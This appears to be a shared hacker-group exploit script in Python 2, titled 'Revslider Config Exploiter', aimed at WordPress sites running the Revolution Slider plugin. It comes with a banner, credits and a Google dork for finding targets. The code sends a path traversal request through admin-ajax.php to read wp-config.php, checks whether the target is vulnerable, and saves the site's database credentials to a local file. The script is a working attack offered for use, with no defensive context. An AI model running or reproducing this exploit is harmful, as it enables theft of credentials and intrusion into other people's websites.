Revslider Config Exploiter [Python]

1. #!/usr/bin/python
2. import urllib2,urllib,os,sys,re,subprocess
3. import requests as requests
4. from threading import Thread
5. import time
6. from subprocess import Popen, PIPE
7. import httplib,socket
8. print """
9. ############################################################
10. # ____ __ __ _ ____ ____ ____ __ _ ____ #
11. # ( _ \ / \ ( ( \( \ ( _ \( __)( ( \(__ ) #
12. # ) _ (( O )/ / ) D ( ) _ ( ) _) / / / _/ #
13. # (____/ \__/ \_)__)(____/ (____/(____)\_)__)(____) #
14. # Revslider Config Exploiter #
15. # Shared By Xyb3r D3vil - PakXploiters #
16. # Google Dork : inurl:/wp-content/plugins/revlisder #
17. # Facebook : https://www.facebook.com/XybEr.D3vil #
18. # #
19. ###########################################################
20. """
21.  
22. if len(sys.argv)!=2:
23. sys.stderr.write('[+]~ Usage : '+sys.argv[0]+' http://example.com/path \n ')
24. sys.exit(1)
25.  
26. target = sys.argv[1]
27.  
28. if 'http://' not in target:
29. target= 'http://'+target
30.  
31. print'[#] Target : ' + sys.argv[1]
32.  
33. response = urllib2.urlopen(target+'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php')
34. r = requests.get(target+'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php')
35. html = response.read()
36.  
37. print "[+] Checking Target if Vulnerable"
38.  
39. if "DB" in html:
40. print "[+] Target is Vulnerable"
41.  
42. else:
43. print "[+] Target not Vulnerable"
44.  
45. if "DB" not in html:
46. sys.exit(1)
47.  
48. f = open("config.txt", "w")
49. time.sleep(3)
50. print "[+] Writing Config ..."
51. time.sleep(4)
52. f.write(html);
53. print "[+] Writing Config File Success"
54. print "[~] File output : config.txt"